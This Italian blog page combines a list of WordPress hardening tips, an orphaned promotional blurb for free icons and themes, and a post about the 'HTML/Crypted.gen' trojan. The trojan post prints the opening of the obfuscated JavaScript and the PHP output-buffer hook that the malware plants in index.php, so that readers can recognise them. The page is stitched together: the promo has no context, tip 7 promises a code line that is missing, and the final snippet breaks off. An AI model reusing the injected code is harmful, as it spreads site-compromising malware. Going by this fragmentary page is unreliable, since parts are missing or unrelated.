Fonte: http://www.antezeta.it/blog/sicurezza-wordpress

1. Conosci i tuoi plugin (estensioni)

Plugin sviluppati da terze parti consentono un accesso significativo al tuo blog, il che rende indispensabile che tu ti fidi dell’autore di qualsiasi plugin installato – o aggiornato. Alcuni plugin sono indicati di seguito – non posso garantire per l’affidabilità delle attuali versioni: puoi utilizzarli a tuo rischio.

2. Utilizza una versione recente di WordPress

Quasi tutti i software contengono errori o bug che vengono corretti col passare del tempo. In generale, mantenere la tua installazione WordPress aggiornata è un ottimo modo per evitare problemi conosciuti. È da notare che la versione più recente, in particolare nel caso di aggiornamenti importanti, può causare più problemi che risolverli. Quindi, tieni WordPress aggiornato, ma lascia che altri lo facciano prima! Notizie sui rilasci ufficiali di WordPress sono fornite dal feed nel tuo cruscotto WordPress; è inoltre possibile aggiungere questo feed dagli sviluppatori WordPress al tuo lettore di feed RSS.

3. Cambia l’account dell’amministratore dall’impostazione predefinita “admin”

Ogni hacker sa che WordPress ha un utente admin che gode dei privilegi dell’amministrazione come fosse un dio. Rimuovi l’utente admin per rallentare gli hacker. Crea un utente WordPress con i privilegi di amministratore utilizzando l’interfaccia di amministrazione. Esci da WordPress ed accedi nuovamente come nuovo utente. Cancella l’utente admin. Il nuovo utente amministratore dovrebbe essere diverso da quello che normalmente scrive post, cioè non visibile nei post.

4. Proteggi la tua interfaccia di amministrazione WordPress con una password a livello del server

Il nostro obiettivo è quello di aggiungere un ulteriore livello di sicurezza all’amministrazione WordPress. Gli utenti su Apache dovrebbero fare riferimento alla documentazione sull’autenticazione o prendere in considerazione una plugin WordPress. Gli utenti IIS potrebbero trovare queste istruzioni utili.

5. Rinomina le tabelle del tuo database WordPress

Gli attacchi da parte degli Hacker che sfruttano il tuo database generalmente richiedono la conoscenza dei nomi delle tabelle nel database. WordPress consente nomi alternativi per le tabelle del database. Ci sono diversi plugin per definire il prefisso delle tabelle che faranno questo per te, oppure è possibile seguire le istruzioni manuali. Nota che si possono avere problemi con le estensioni (plugin) scritti male se non si riconosce il valore del prefisso delle tabelle.

6. Nascondi agli occhi indiscreti la tua directory di plugin

In molte installazioni WordPress è possibile visualizzare un elenco dei plugin installati, navigando alla directory /wp-content/plugins/. Tale trasparenza non è consigliata, visto che vulnerabilità note nei plugin possono essere facilmente sfruttate. Aggiungi un file vuoto come indice, tipo index.html, nella directory. È inoltre possibile proteggerlo con un file .htaccess nel caso tu stia impiegando Apache come server.

7. Rimuovi le informazioni sulla versione di WordPress dal tuo blog e di eventuali plugin attivi

Dichiarando al mondo la versione WordPress che giri, semplifichi notevolmente il lavoro ad un hacker. In un post Peter Westwood ha documentato come fare per sopprimere informazioni sulla versione di WordPress nei feed e nel blog. Ho confezionato il suo codice in una maniera molto rudimentale come un plugin WordPress per nascondere la versione di WordPress. Nei theme più vecchi sarà ancora necessario rimuovere una riga simile a questa:

8. La segnalazione di errori php

“Se qualcosa prende la forma di una pera” come dicono gli inglesi (cioè, va storto), WordPress ed i suoi plugin possono far visualizzare codici di errori php. In un ambiente di produzione si dovrebbero sopprimere gli errori. Consulta la documentazione per la segnalazione di errori php per una discussione più approfondita.

9. Scansione sicurezza WordPress

Il plugin WP Security Scan fa un controllo del tuo blog in merito alla sicurezza e tenta di attuare molti dei suggerimenti indicati in questo articolo. Blogsecurity.net offre un’alternativa plugin di scansione.

Related Posts

• No Related Post

Tra cui:

400 Icons

4 Premium WordPress Themes

3 Tumblr Themes

Many More Freebies!

Allora, cosa aspettate… scaricate subito!!!!

Related Posts

• No Related Post

Sta accadendo sempre più spesso ultimamente, che molti siti basati su Wordpress e Joomla, vengono attaccati in qualche modo dal Trojan segnalato da Avira come “HTML/Crypted.gen“. Non sono riuscito a capire se si tratta di un problema relativo a bug esistenti in questi due sistemi di publishing (ma ne dubito) o piuttosto da un virus che ha attaccato i server che ospitano tali siti.

Quest’ultima ipotesi mi è stata avvalorata dal fatto che tutte le persone che ho contattato e che hanno avuto lo stesso problema, hanno tutti l’hosting presso lo stesso provider. Non muovo ancora accuse per ora perchè la cosa è alquanto anomala e in rete non ho trovato informazioni soddisfacenti per poter fare un’ipotesi valida, per cui le mie sono soltanto supposizioni e vanno prese come tali.

Nel frattempo spero che questo post possa essere d’aiuto e oggetto di discussione per capire da dove si origina il problema.

C’è innanzitutto da dire che il virus altera le pagine (ma non sempre tutte le pagine del sito) con estensioni html, php, asp e js, aggiungendovi un codice javascript criptato, che più o meno inizia in questo modo:

<script language="javascript">$a=\"Z64dZ3dZ22q|se|qdu]qwys^e}rub8tqiZ3c0}

Dico “più o meno” perchè non a tutti si presenta allo stesso modo, è facile comunque identificare il codice maligno perchè, come si vede, è in qualche modo offuscato: non si leggono parole chiave ma soltanto sequenze di caratteri apparentemente assurde.

Relativamente a wordpress, invece, il codice malevolo viene generalmente inserito in tutte le pagine “index.php” e inizia in questo modo:

1	ob_start("security_update"); function security_update($buffer){return $buffer."